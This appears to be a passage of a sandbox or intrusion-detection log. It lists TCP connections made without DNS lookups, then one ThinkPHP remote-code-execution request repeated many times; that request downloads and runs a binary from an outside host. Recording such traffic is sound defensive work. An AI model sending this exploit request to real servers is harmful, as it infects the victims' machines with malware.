Source: unknown	TCP traffic detected without corresponding DNS query: 112.91.232.120
Source: unknown	TCP traffic detected without corresponding DNS query: 112.120.221.55
Source: unknown	TCP traffic detected without corresponding DNS query: 112.46.57.128
Source: unknown	TCP traffic detected without corresponding DNS query: 112.25.237.38
Source: unknown	TCP traffic detected without corresponding DNS query: 112.75.238.103
Source: unknown	TCP traffic detected without corresponding DNS query: 112.113.140.38
Source: unknown	TCP traffic detected without corresponding DNS query: 112.141.81.118
Source: unknown	TCP traffic detected without corresponding DNS query: 112.249.224.74
Source: unknown	TCP traffic detected without corresponding DNS query: 112.81.165.77
Source: unknown	TCP traffic detected without corresponding DNS query: 112.63.5.68
Source: unknown	TCP traffic detected without corresponding DNS query: 112.98.34.163
Source: unknown	TCP traffic detected without corresponding DNS query: 112.15.194.135
Source: unknown	TCP traffic detected without corresponding DNS query: 112.127.226.10
Source: unknown	TCP traffic detected without corresponding DNS query: 112.117.76.8
Source: unknown	TCP traffic detected without corresponding DNS query: 112.40.81.120
Source: unknown	TCP traffic detected without corresponding DNS query: 112.56.48.141
Source: unknown	TCP traffic detected without corresponding DNS query: 112.155.123.186
Source: unknown	TCP traffic detected without corresponding DNS query: 112.241.78.187
Source: unknown	TCP traffic detected without corresponding DNS query: 112.115.28.81
Source: unknown	TCP traffic detected without corresponding DNS query: 112.200.69.248
Source: unknown	TCP traffic detected without corresponding DNS query: 112.248.188.144
Source: unknown	TCP traffic detected without corresponding DNS query: 112.199.179.84
Source: unknown	TCP traffic detected without corresponding DNS query: 112.77.84.46
Source: unknown	TCP traffic detected without corresponding DNS query: 112.46.245.222
Source: unknown	TCP traffic detected without corresponding DNS query: 112.113.220.101
Source: unknown	TCP traffic detected without corresponding DNS query: 112.249.220.205
Source: unknown	TCP traffic detected without corresponding DNS query: 112.254.240.72
Source: unknown	TCP traffic detected without corresponding DNS query: 112.32.135.12
Source: unknown	TCP traffic detected without corresponding DNS query: 112.67.64.214
Source: unknown	TCP traffic detected without corresponding DNS query: 112.170.179.49
Source: unknown	TCP traffic detected without corresponding DNS query: 112.5.13.15
Source: unknown	TCP traffic detected without corresponding DNS query: 112.235.26.214
Source: unknown	TCP traffic detected without corresponding DNS query: 112.239.35.105
Source: unknown	TCP traffic detected without corresponding DNS query: 112.120.133.38
Source: unknown	TCP traffic detected without corresponding DNS query: 112.224.13.148
Source: unknown	TCP traffic detected without corresponding DNS query: 112.19.203.131
Source: unknown	TCP traffic detected without corresponding DNS query: 112.82.244.221

Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
